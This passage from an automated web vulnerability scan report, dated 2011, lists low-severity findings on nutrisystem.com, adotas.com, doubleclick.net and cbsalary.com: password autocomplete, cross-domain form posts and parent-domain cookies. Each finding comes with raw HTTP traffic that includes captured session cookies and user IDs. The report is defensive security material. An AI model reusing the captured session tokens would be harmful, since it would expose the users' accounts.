DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="P3P" content='pol
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/product-pages/womens_overview.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.34. http://www.nutrisystem.com/jsps_hmr/shop/order_now.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/shop/order_now.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/shop/order_now.jsp?categoryId=384 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
       <meta http-equiv="P3P"
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/shop/includes/order_now_v1.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.35. http://www.nutrisystem.com/jsps_hmr/success_stories/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/success_stories/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/success_stories/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:19:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="P3P" content='p
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/success_stories/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.36. http://www.nutrisystem.com/jsps_hmr/terms/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/terms/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/terms/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/terms/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.37. http://www.nutrisystem.com/jsps_hmr/tools_community/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/tools_community/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/tools_community/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="P3P" content='pol
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/tools_community/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.38. http://www.nutrisystem.com/jsps_hmr/user/login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/user/login.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/user/login.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:20:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/user/login.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.39. http://www.nutrisystem.com/jsps_hmr/user/login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/user/login.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/user/login.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:20:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
<div class="box m03-easiest-diet-ever">

   <form action="https://www.nutrisystem.com/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/user/templates/login_form_template.jsp.loginForm" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
<td><input value="" maxlength="30" type="password" class="summary" istyle="width: 150px; height:18px; line-height: 12px;" size="15" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

8. Cross-domain POST  previous  next
There are 2 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


8.1. http://www.adotas.com/2010/12/are-you-a-search-geek-prove-it/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /2010/12/are-you-a-search-geek-prove-it/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /2010/12/are-you-a-search-geek-prove-it/ HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:56:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Cache-Control: max-age=7200
Expires: Wed, 12 Jan 2011 05:56:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 69714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<div>
<form method=post action="http://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8" id="email-subscribe-bottom" >
                               <input type=hidden name="fields_ajkey" value="a56214e708">
...[SNIP]...

8.2. http://www.adotas.com/2010/12/are-you-a-search-geek-prove-it/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /2010/12/are-you-a-search-geek-prove-it/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /2010/12/are-you-a-search-geek-prove-it/ HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:56:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Cache-Control: max-age=7200
Expires: Wed, 12 Jan 2011 05:56:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 69714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
</div>
       <form method=post action="http://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8" id="email-subscribe" >
<label for="subscribe">
...[SNIP]...

9. Cookie scoped to parent domain  previous  next
There are 13 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. http://ad.doubleclick.net/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
X-Dclk-Inred-Response-Type: None
Content-Length: 43
Set-Cookie: id=c1774ac3100004e||t=1294800709|et=730|cs=c7kan7z-; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 02:51:49 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 02:51:49 GMT
Date: Wed, 12 Jan 2011 02:51:49 GMT
Server: GFE/2.0
Expires: Wed, 12 Jan 2011 02:51:49 GMT
Connection: close

GIF89a.............!.......,...........L..;

9.2. http://ad.doubleclick.net/ad/N1823.microsoft.com/B5062614.67  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N1823.microsoft.com/B5062614.67

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N1823.microsoft.com/B5062614.67;sz=1x1 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Wed, 12 Jan 2011 02:17:15 GMT
Location: http://s0.2mdn.net/viewad/568459/10-1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 12 Jan 2011 02:32:15 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: GFE/2.0
Content-Type: text/html


9.3. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.53  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4492.MSN/B5014254.53

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N4492.MSN/B5014254.53;sz=1x1;ord=1234? HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Wed, 12 Jan 2011 02:17:15 GMT
Location: http://m.doubleclick.net/dot.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 12 Jan 2011 02:32:15 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: GFE/2.0
Content-Type: text/html


9.4. http://ad.doubleclick.net/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click;h=v8/3a8d/4/0/%2a/b;227537752;0-0;0;50195631;4307-300/250;38347468/38365225/1;;~sscs=%3fhttp://aperture.displaymarketplace.com/audmeasure.gif?liveconclientID=3298535473152&CreativeID=38347468&PlacementID=50195631&EventType=Click&rand=7398257&RedirectURL=http://www.metamucil.com/videos.php HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://aperture.displaymarketplace.com/audmeasure.gif?liveconclientID=3298535473152&CreativeID=38347468&PlacementID=50195631&EventType=Click&rand=7398257&RedirectURL=http://www.metamucil.com/videos.php
Set-Cookie: id=c1774ac3100005a||t=1294800709|et=730|cs=mbrqwyoq; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 02:51:49 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 02:51:49 GMT
Date: Wed, 12 Jan 2011 02:51:49 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


9.5. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;234603142;52388354;c HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://weeklyad.staples.com/staples/new_user_entry.aspx?adref=q4efficiencyMSN&cm_mmc=display_ads-_-WeeklyAd-_-WeeklyAd-_-MSN&cid=BAN:RETAIL:MSN:MSN:WEEKLYAD:20101201:WEEKLYAD:VARIOUS:N
Set-Cookie: id=c653243310000d9|737194/848412/14986|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 02:51:45 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


9.6. http://www.cbsalary.com/quizzes/fun-jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbsalary.com
Path:   /quizzes/fun-jobs/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /quizzes/fun-jobs/?lr=cbmsn&siteid=cbmsnjmBOB HTTP/1.1
Host: www.cbsalary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29755
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=d0331698c5b74becb838ec5848794ddb-348096318-w6-6; domain=.cbsalary.com; path=/; HttpOnly
Set-Cookie: BID=X14B3012F216803CA5A346885C92D4AFD4CF26C5E0660753222F71FB3571EF700C0303ECCC53B2856E2B1E284829982B21; domain=.cbsalary.com; expires=Thu, 12-Jan-2012 02:25:17 GMT; path=/; HttpOnly
